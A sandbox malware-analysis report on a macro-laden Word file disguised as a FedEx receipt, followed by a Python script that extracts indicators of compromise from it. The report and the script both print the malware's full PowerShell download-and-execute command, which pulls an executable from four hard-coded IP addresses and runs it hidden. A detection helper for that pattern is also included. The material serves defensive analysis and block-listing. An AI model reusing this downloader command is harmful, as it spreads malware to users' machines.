3692f99b...4ab2 | VTI
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Exploit, Dropper, Downloader

3692f99b76663e864b3fae22828ab01021dcc50c33f5ec041aa3b055478a4ab2 (SHA256)

receipt_FedEX_4028873.doc

Word Document

Created at 2018-12-06 22:25:00

Notifications (1/1)

The overall sleep time of all monitored processes was truncated from "45 seconds" to "30 seconds" to reveal dormant functionality.

Severity | Category | Operation | Classification
5/5 | Anti Analysis | Tries to detect virtual machine | -
  • Possibly trying to detect VM via rdtsc.
5/5 | Injection | Writes into the memory of another running process | -
  • "c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe" modifies memory of "c:\windows\system32\svchost.exe"
4/5 | Process | Creates process | -
  • Creates process "cmd /c powershell "'powershell ""function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\tmp6149.exe'';'""| out-file -encoding ascii -filepath %tmp%\tmp1971.bat; start-process '%tmp%\tmp1971.bat' -windowstyle hidden"".
  • Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
  • Creates process "C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat".
  • Creates process "C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe".
4/5 | Process | Reads from memory of another process | -
  • "c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe" reads from "C:\Windows\system32\svchost.exe".
4/5 | OS | Disables a crucial system service | -
4/5 | Process | Executes encoded PowerShell script | -
  • Executes encoded PowerShell script to possibly hide malicious payload.
4/5 | Network | Downloads data | Downloader
4/5 | YARA | YARA match | -
  • Rule "PowerShell_Download_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat"
  • Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\receipt_FedEX_4028873.doc"
3/5 | Network | Checks external IP address | -
  • Checks external IP by asking IP info service at "HTTP://icanhazip.com/".
3/5 | Network | Connects to remote host | -
3/5 | PE | Executes dropped PE file | -
2/5 | File System | Known suspicious file | Exploit
2/5 | Network | Connects to HTTP server | -
2/5 | PE | Drops PE file | Dropper
2/5 | VBA Macro | Executes macro on specific worksheet event | -
  • Executes macro automatically on target "auto" and event "open".
1/5 | Process | Creates system object | -
  • Creates mutex with name "gcc-shmem-tdm2-mutex_global_static_shmem".
  • Creates mutex with name "gcc-shmem-tdm2-_pthread_cancelling_shmem".
1/5 | VBA Macro | Contains Office macro | -
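The process-creation detail above is the whole downloader: a PowerShell function that tries each address in a hard-coded array, downloads http://<ip>/uncle_sam.php to %tmp%\tmp6149.exe, stops at the first success and then runs the file. Pulling the indicators out of that nested command line by hand is error-prone because the literals are escaped through three quoting layers (cmd, an outer PowerShell string, and the inner script). The script below is an added example, not VMRay's code; it takes the detail lines of this report as plain text (copied from the rows above), extracts the IPs, reconstructs the candidate download URLs in the order the loop would try them, and collects the dropped file paths, mutex names and sample hash. The %tmp% form of the paths is kept as written rather than resolved, since the user profile is sandbox-specific.

```python
"""Extract IOCs from the VTI detail lines of the sandbox report above.

Added example; not VMRay's code. Input is the report text itself, so the
only parsing assumptions are the regexes below.
"""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Optional

# Detail lines copied from the report above. The PowerShell one-liner is
# quoted three levels deep (cmd -> powershell -> inner script string), which
# is why string literals inside it appear as ''...''.
REPORT_EXCERPT = r"""
3692f99b76663e864b3fae22828ab01021dcc50c33f5ec041aa3b055478a4ab2 (SHA256)
  • "c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe" modifies memory of "c:\windows\system32\svchost.exe"
  • Creates process "cmd /c powershell "'powershell ""function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\tmp6149.exe'';'""| out-file -encoding ascii -filepath %tmp%\tmp1971.bat; start-process '%tmp%\tmp1971.bat' -windowstyle hidden"".
  • Checks external IP by asking IP info service at "HTTP://icanhazip.com/".
  • Creates mutex with name "gcc-shmem-tdm2-mutex_global_static_shmem".
  • Creates mutex with name "gcc-shmem-tdm2-_pthread_cancelling_shmem".
"""

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Complete URLs; the template ''http://''+$liu+... is not matched because the
# scheme is immediately followed by a quote.
URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)
# Path literal the script appends to each address, e.g. ''/uncle_sam.php''
PATH_LITERAL_RE = re.compile(r"''(/[^']*)''")
# %tmp%-relative or drive-letter Windows paths (stop at quotes, ';' and ')')
FILE_RE = re.compile(r"(?:%tmp%|[a-z]:)\\[^\s\"';)]+", re.IGNORECASE)
MUTEX_RE = re.compile(r'Creates mutex with name "([^"]+)"')
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")


def _unique(items):
    """Order-preserving de-duplication."""
    return list(dict.fromkeys(items))


def _is_global(ip: str) -> bool:
    """True for routable addresses; drops loopback/RFC1918 noise and
    malformed dotted quads such as 999.1.1.1 that the regex admits."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


@dataclass
class Indicators:
    sha256: Optional[str] = None
    ips: list = field(default_factory=list)
    download_urls: list = field(default_factory=list)
    other_urls: list = field(default_factory=list)
    files: list = field(default_factory=list)
    mutexes: list = field(default_factory=list)


def extract_indicators(text: str) -> Indicators:
    ind = Indicators()
    m = SHA256_RE.search(text)
    ind.sha256 = m.group(0) if m else None
    ind.ips = [ip for ip in _unique(IPV4_RE.findall(text)) if _is_global(ip)]
    # The loop builds http://<ip><path> per array element and breaks on the
    # first successful download, so candidates are listed in array order.
    ind.download_urls = [f"http://{ip}{path}"
                         for path in _unique(PATH_LITERAL_RE.findall(text))
                         for ip in ind.ips]
    ind.other_urls = _unique(URL_RE.findall(text))
    # Windows paths are case-insensitive; normalise before de-duplicating.
    ind.files = _unique(p.lower() for p in FILE_RE.findall(text))
    ind.mutexes = _unique(MUTEX_RE.findall(text))
    return ind


def is_download_and_execute(command: str) -> bool:
    """Flag the shape seen in the report: a WebClient download into %tmp%
    and a Start-Process of that file within one command line."""
    c = command.lower()
    return "downloadfile(" in c and "start-process" in c and "%tmp%" in c


if __name__ == "__main__":
    ind = extract_indicators(REPORT_EXCERPT)
    print("sha256:", ind.sha256)
    print("download candidates (in try order):", *ind.download_urls, sep="\n  ")
    print("other urls:", ind.other_urls)
    print("files:", ind.files)
    print("mutexes:", ind.mutexes)
    print("download-and-execute:", is_download_and_execute(REPORT_EXCERPT))
```

All four URLs belong on the block list even though the sandbox only needed one to answer: the loop order is fixed, so a takedown of the first host simply shifts traffic to the next. The icanhazip.com request is kept separate because it is a benign service used for an external-IP check, not a payload source.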